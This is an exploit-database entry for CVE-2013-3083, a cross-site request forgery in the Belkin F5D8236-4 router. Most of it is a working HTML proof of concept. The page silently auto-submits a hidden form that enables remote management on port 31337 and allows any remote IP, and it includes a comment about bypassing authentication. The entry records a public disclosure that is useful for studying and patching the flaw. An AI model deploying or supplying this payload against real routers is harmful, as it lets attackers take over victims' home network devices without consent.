Belkin F5D8236-4 Router - Cross-Site Request Forgery

Author: Jacob Holcomb
type: remote
platform: hardware
port: 
date_added: 2013-04-25 
date_updated: 2015-10-19 
verified: 1 
codes: CVE-2013-3083;OSVDB-92551 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/59476/info

Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.

<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>